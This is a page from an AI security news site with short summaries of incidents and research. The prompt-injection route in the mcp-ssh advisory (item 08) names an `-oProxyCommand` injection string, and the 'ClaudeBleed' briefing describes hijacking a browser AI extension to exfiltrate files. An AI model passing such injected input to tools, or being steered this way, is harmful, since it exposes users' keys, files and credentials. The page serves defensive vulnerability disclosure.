aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingFriday, May 8, 2026
>

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

>

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

Latest Intel

page 63/371
VIEW ALL
01

Has Google’s AI watermarking system been reverse-engineered?

security
Apr 14, 2026

A developer claims to have reverse-engineered Google DeepMind's SynthID system, which is a watermarking technology that embeds hidden marks in AI-generated images to prove their origin. The developer says they can strip these watermarks from images or add fake ones, though Google disputes this claim.

>

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

>

Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely-trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.

The Verge (AI)
02

Byzantine-Robust Asynchronous Federated Learning via Feature Fingerprinting

researchsecurity
Apr 14, 2026

Asynchronous federated learning (AFL, where multiple devices train a shared AI model without waiting for each other to finish) is faster than synchronous methods but more vulnerable to Byzantine attacks (when some devices send false or corrupted data to sabotage the model). Researchers propose Belisa, a framework that uses feature fingerprints (unique patterns in how local models represent data) to identify and filter out malicious devices, improving robustness and efficiency in real-world scenarios where devices have different data and hardware capabilities.

Fix: The source proposes Belisa as a Byzantine-robust AFL framework that addresses this vulnerability. Belisa works by leveraging a reference model trained on publicly available data to quantify feature fingerprints (discrepancies between feature representations of local models) and filtering out malicious models through clustering. According to the paper, Belisa lowered average test error rates to 0.42x that of baseline methods under attack scenarios and accelerated aggregation by an average of 12.3x compared to other methods.

IEEE Xplore (Security & AI Journals)
03

‘Mythos-Ready’ Security: CSA Urges CISOs to Prepare for Accelerated AI Threats

securitysafety
Apr 14, 2026

AI models like Mythos are making cyberattacks faster and more dangerous by shortening the time between when security flaws are discovered and when attackers exploit them. Security leaders (CISOs, chief information security officers) need to prepare urgently for this new threat environment where attacks happen at high speed.

SecurityWeek
04

AI companies make powerful tech – but they’re also savvy marketers

industry
Apr 14, 2026

This article discusses how AI companies like Anthropic use marketing to promote their capabilities, using Claude as an example of technology that may be overhyped despite being genuinely advanced. The piece cautions readers against getting swept up in marketing claims about AI's power without critical evaluation.

The Guardian Technology
05

How AI is transforming threat detection

industry
Apr 14, 2026

AI is transforming threat detection by processing massive amounts of security data and identifying suspicious patterns faster than humans alone, with 50% of threat detection platforms expected to use agentic AI (AI systems that can take independent actions) by 2028. Organizations are already automating routine tasks like alert review and investigation work, seeing 40-50% efficiency gains for lower-level security operations, while AI agents reduce alert fatigue by clustering similar alerts and prioritizing them based on risk.

CSO Online
06

The AI inflection point: What security leaders must do now

securityindustry
Apr 14, 2026

AI is moving from experimentation to production deployment in cybersecurity, and security leaders must treat it as a fundamental shift in how security operations work, not just an added tool. Attackers are using AI to conduct faster intrusions (some occurring in under 30 seconds), which exceeds the speed of human-only security responses, making AI deployment urgent for defenders. There is currently a limited window where defenders and attackers have roughly equal access to AI technology, but advantage will go to those who operationalize it most effectively and quickly.

CSO Online
07

Man charged with attempted murder over attack on home of OpenAI's Sam Altman

security
Apr 13, 2026

A 20-year-old Texas man has been charged with attempted murder and federal felony charges after allegedly throwing a Molotov cocktail (a homemade incendiary weapon) at OpenAI CEO Sam Altman's San Francisco home and attempting to set fire to OpenAI's headquarters. Authorities found the suspect carrying documents that opposed AI development and called for violence against AI executives and investors. OpenAI and law enforcement officials condemned the violence, with OpenAI calling for debate through democratic processes rather than violence.

BBC Technology
08

GHSA-p4h8-56qp-hpgv: SSH/SCP option injection allowing local RCE in @aiondadotcom/mcp-ssh

security
Apr 13, 2026

An SSH/SCP option injection vulnerability in the @aiondadotcom/mcp-ssh library allowed attackers to execute arbitrary commands locally on the machine running the MCP server (a tool that connects an AI to external systems). By crafting malicious input like `-oProxyCommand=...`, attackers could trick SSH into running their code before any network connection happened, potentially stealing SSH keys and credentials. The vulnerability could be triggered even without a malicious user, since an LLM (large language model) could be tricked through prompt injection (hiding attacker instructions in text it reads) to pass the malicious input to the tool.

Fix: Fixed in version 1.3.5. The patch includes: adding `--` argument terminators to all SSH/SCP invocations (which tells the command where options end and arguments begin), implementing a strict whitelist for host aliases that rejects leading dashes and shell metacharacters, requiring all host aliases to be defined in `~/.ssh/config` or `~/.ssh/known_hosts`, and resolving `ssh.exe`/`scp.exe` to absolute paths with `shell: false` on Windows to prevent command re-parsing. No workarounds exist; users must upgrade to 1.3.5.

GitHub Advisory Database
09

Daniel Moreno-Gama is facing federal charges for attacking Sam Altman’s home and OpenAI’s HQ

security
Apr 13, 2026

Daniel Moreno-Gama was arrested and charged with federal crimes after traveling from Texas to California and attacking OpenAI's facilities and CEO Sam Altman's home with a Molotov cocktail (an incendiary weapon made from a bottle of flammable liquid). He also attempted to break into OpenAI's headquarters and stated he intended to burn down the building and kill people inside. His charges include attempted destruction of property using explosives and illegal possession of a firearm.

The Verge (AI)
10

Trusted access for the next era of cyber defense

securitypolicy
Apr 13, 2026

OpenAI is expanding its Trusted Access for Cyber (TAC) program to provide AI tools to thousands of cybersecurity defenders and teams protecting critical software. The company has created GPT-5.4-Cyber, a specialized version of its AI model designed specifically for defensive cybersecurity work, and is implementing cyber-specific safeguards (built-in restrictions to prevent misuse) in model deployments. This effort aims to help defenders find and fix security vulnerabilities faster while preventing attackers from misusing the same AI capabilities.

Fix: The source explicitly mentions the following measures: cyber-specific safeguards included in model deployments starting in 2025; the Preparedness Framework (strengthened in 2023); identity verification and KYC (know-your-customer, a process to confirm who someone is) to control access to advanced capabilities; Codex Security tool to identify and fix vulnerabilities at scale; iterative deployment with continuous updates to models and safety systems based on learning about capabilities and risks; and improvements in resilience to jailbreaks (techniques that try to bypass AI safety restrictions) and other adversarial attacks.

OpenAI Blog
Prev1...6162636465...371Next